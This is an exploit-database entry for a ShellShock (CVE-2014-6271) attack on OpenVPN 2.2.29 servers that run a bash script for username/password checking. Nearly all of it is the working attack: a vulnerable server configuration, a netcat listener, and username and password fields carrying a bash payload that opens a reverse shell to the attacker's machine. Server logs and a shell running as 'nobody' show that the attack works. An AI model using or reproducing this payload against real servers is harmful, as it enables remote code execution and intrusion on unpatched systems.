Search...

OpenVPN 2.2.29 - ShellShock Exploit

2014-10-10T00:00:00
ID SSV:87317
Type seebug
Reporter Root
Modified 2014-10-10T00:00:00

Description

No description provided by source.

                                        
                                            
                                                # Exploit Title: ShellShock OpenVPN Exploit
 
# Date: Fri Oct  3 15:48:08 EDT 2014
 
# Exploit Author: hobbily AKA @fj33r
 
# Version: 2.2.29
 
# Tested on: Debian Linux
 
# CVE : CVE-2014-6271
 
#Probably should of submitted this the day I tweeted it.
### server.conf
port 1194
proto udp
dev tun
client-cert-not-required
auth-user-pass-verify /etc/openvpn/user.sh via-env
tmp-dir "/etc/openvpn/tmp"
ca ca.crt
cert testing.crt
key testing.key  # This file should be kept secret
dh dh1024.pem
server 10.8.0.0 255.255.255.0
keepalive 10 120
comp-lzo
user nobody
group nogroup
persist-key
persist-tun
client-cert-not-required
plugin /usr/lib/openvpn/openvpn-auth-pam.so login
script-security 3
status openvpn-status.log
verb 3
 
### user.sh
#!/bin/bash
echo "$username"
echo "$password"
 
### start server
openvpn server.con
 
### terminal 1
nc -lp 4444
 
### terminal 2
sudo openvpn --client --remote 10.10.0.52 --auth-user-pass --dev tun --ca ca.cert --auth-nocache --comp-lzo
 
### username && password were both shellshocked just incase
user:() { :;};/bin/bash -i >& /dev/tcp/10.10.0.56/4444 0>&1 &
pass:() { :;};/bin/bash -i >& /dev/tcp/10.10.0.56/4444 0>&1 &
 
### log
Mon Sep 29 20:56:56 2014 NOTE: the current --script-security setting may allow this configuration to call user-defined scripts
Mon Sep 29 20:56:56 2014 PLUGIN_INIT: POST /usr/lib/openvpn/openvpn-auth-pam.so '[/usr/lib/openvpn/openvpn-auth-pam.so] [login]' intercepted=PLUGIN_AUTH_USER_PASS_VERIFY
Mon Sep 29 20:56:56 2014 Diffie-Hellman initialized with 1024 bit key
Mon Sep 29 20:56:56 2014 WARNING: POTENTIALLY DANGEROUS OPTION --client-cert-not-required may accept clients which do not present a certificate
Mon Sep 29 20:56:56 2014 TLS-Auth MTU parms [ L:1542 D:138 EF:38 EB:0 ET:0 EL:0 ]
Mon Sep 29 20:56:56 2014 Socket Buffers: R=[163840->131072] S=[163840->131072]
Mon Sep 29 20:56:56 2014 ROUTE default_gateway=10.10.0.1
Mon Sep 29 20:56:56 2014 TUN/TAP device tun0 opened
Mon Sep 29 20:56:56 2014 TUN/TAP TX queue length set to 100
Mon Sep 29 20:56:56 2014 do_ifconfig, tt->ipv6=0, tt->did_ifconfig_ipv6_setup=0
Mon Sep 29 20:56:56 2014 /sbin/ifconfig tun0 10.8.0.1 pointopoint 10.8.0.2 mtu 1500
Mon Sep 29 20:56:56 2014 /sbin/route add -net 10.8.0.0 netmask 255.255.255.0 gw 10.8.0.2
Mon Sep 29 20:56:56 2014 Data Channel MTU parms [ L:1542 D:1450 EF:42 EB:135 ET:0 EL:0 AF:3/1 ]
Mon Sep 29 20:56:56 2014 GID set to nogroup
Mon Sep 29 20:56:56 2014 UID set to nobody
Mon Sep 29 20:56:56 2014 UDPv4 link local (bound): [undef]
Mon Sep 29 20:56:56 2014 UDPv4 link remote: [undef]
Mon Sep 29 20:56:56 2014 MULTI: multi_init called, r=256 v=256
Mon Sep 29 20:56:56 2014 IFCONFIG POOL: base=10.8.0.4 size=62, ipv6=0
Mon Sep 29 20:56:56 2014 Initialization Sequence Completed
Mon Sep 29 20:57:54 2014 MULTI: multi_create_instance called
Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Re-using SSL/TLS context
Mon Sep 29 20:57:54 2014 10.10.0.56:1194 LZO compression initialized
Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Control Channel MTU parms [ L:1542 D:138 EF:38 EB:0 ET:0 EL:0 ]
Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Data Channel MTU parms [ L:1542 D:1450 EF:42 EB:135 ET:0 EL:0 AF:3/1 ]
Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Local Options hash (VER=V4): '530fdded'
Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Expected Remote Options hash (VER=V4): '41690919'
Mon Sep 29 20:57:54 2014 10.10.0.56:1194 TLS: Initial packet from [AF_INET]10.10.0.56:1194, sid=644ea55a 5f832b02
AUTH-PAM: BACKGROUND: user '() { :;};/bin/bash -i >& /dev/tcp/10.10.0.56/4444 0>&1 &' failed to authenticate: Error in service module
Mon Sep 29 20:57:57 2014 10.10.0.56:1194 PLUGIN_CALL: POST /usr/lib/openvpn/openvpn-auth-pam.so/PLUGIN_AUTH_USER_PASS_VERIFY status=1
Mon Sep 29 20:57:57 2014 10.10.0.56:1194 PLUGIN_CALL: plugin function PLUGIN_AUTH_USER_PASS_VERIFY failed with status 1: /usr/lib/openvpn/openvpn-auth-pam.so
_________/bin/bash_-i____/dev/tcp/10.10.0.56/4444_0__1__
 
Mon Sep 29 20:57:57 2014 10.10.0.56:1194 TLS Auth Error: Auth Username/Password verification failed for peer
Mon Sep 29 20:57:57 2014 10.10.0.56:1194 Control Channel: TLSv1, cipher TLSv1/SSLv3 DHE-RSA-AES256-SHA
Mon Sep 29 20:57:57 2014 10.10.0.56:1194 [] Peer Connection Initiated with [AF_INET]10.10.0.56:1194
Mon Sep 29 20:57:59 2014 10.10.0.56:1194 PUSH: Received control message: 'PUSH_REQUEST'
Mon Sep 29 20:57:59 2014 10.10.0.56:1194 Delayed exit in 5 seconds
Mon Sep 29 20:57:59 2014 10.10.0.56:1194 SENT CONTROL [UNDEF]: 'AUTH_FAILED' (status=1)
Mon Sep 29 20:58:01 2014 read UDPv4 [ECONNREFUSED]: Connection refused (code=111)
Mon Sep 29 20:58:04 2014 10.10.0.56:1194 SIGTERM[soft,delayed-exit] received, client-instance exiting
 
### nc listener
nobody@debian:/etc/openvpn$ id
id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
#shoutouts to Fredrik Str�mberg for the post he made on ycombinator
JSON Vulners Source
Initial Source


All product names, logos, and brands are property of their respective owners. All company, product and service names used in this website are for identification purposes only. Use of these names, logos, and brands does not imply endorsement.If you are an owner of some content and want it to be removed, please mail to content@vulners.com Vulners, 2018
Protected by